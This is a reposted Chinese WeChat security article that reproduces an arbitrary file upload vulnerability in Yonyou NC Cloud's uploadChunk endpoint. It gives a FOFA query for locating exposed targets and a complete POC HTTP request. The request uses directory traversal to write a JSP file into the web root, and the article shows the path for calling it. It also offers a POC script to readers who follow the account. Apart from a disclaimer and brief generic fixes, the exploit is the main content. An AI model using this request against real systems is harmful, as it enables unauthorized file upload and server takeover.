点击上方蓝字关注我们
BEGINNING OF SPRING
0x01
阅读须知
Reading Instructions
数字人才创研院秉承探究学习与交流的理念,一切从降低已有潜在威胁出发,所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。
0x02
漏洞概述
Vulnerability Overview
用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业落地数智化。
用友NC Cloud uploadChunk存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。
(文章仅限技术交流,禁止非授权操作!)
0x03
漏洞复现
Vulnerability Recurrence
fofa:title=app=“用友-NC-Cloud”
1.参照如下POC语句并做执行
POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
Host: {Hostname}:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept-Encoding: gzip, deflate
**************************************
--bd966ad8118cfcc67ee341272f2900c4
Content-Disposition: form-data; name="file"; filename="ncchr_log.jsp"
<%out.println("12345678");%>
--bd966ad8118cfcc67ee341272f2900c4--
-------------------------------------------
##其中Hostname为目标漏洞平台的实际地址或域名
2.发送上传.jsp文件的数据包后效果如下:
3.上传成功后,拼接文件访问如下路径,最终显示上传的敏感信息:
http://Hostname:port/nccloud/ncchr_log.jsp.jsp
-------------------------------------------
##其中Hostname为目标漏洞平台的实际地址或域名
(文章仅限技术交流,禁止非授权操作!)
0x04
漏洞脚本
Vulnerability script
1.空间指纹截图如下:
2.关注公众号并回复:NC,获取POC脚本。
(文章仅限技术交流,禁止非授权操作!)
0x05
修复建议
Repair Suggestions
1.实施产品的权限访问控制,降低互联网搜索引擎的查询。
2.加强后台认证要求(如AAAA策略等),提高口令的安全性。
3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。
往期推荐 · 值得阅看
点亮「星标」,让我们不再错过~
2023-10-11
漏洞复现|网神SecGate3600防火墙存在任意文件上传漏洞
2023-09-28
漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞
2023-09-20
漏洞复现|某VPN存在未授权管理用户遍历+任意账号密码修改漏洞
2023-08-15
PHPMyadmin的Getshell方法汇总
2023-07-01
漏洞复现|北京网康 NS-ASG安全网关存在远程命令执行漏洞
2023-06-19
END
原文始发于微信公众号(数字人才创研院):漏洞复现|用友NC存在任意文件上传漏洞[附POC]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论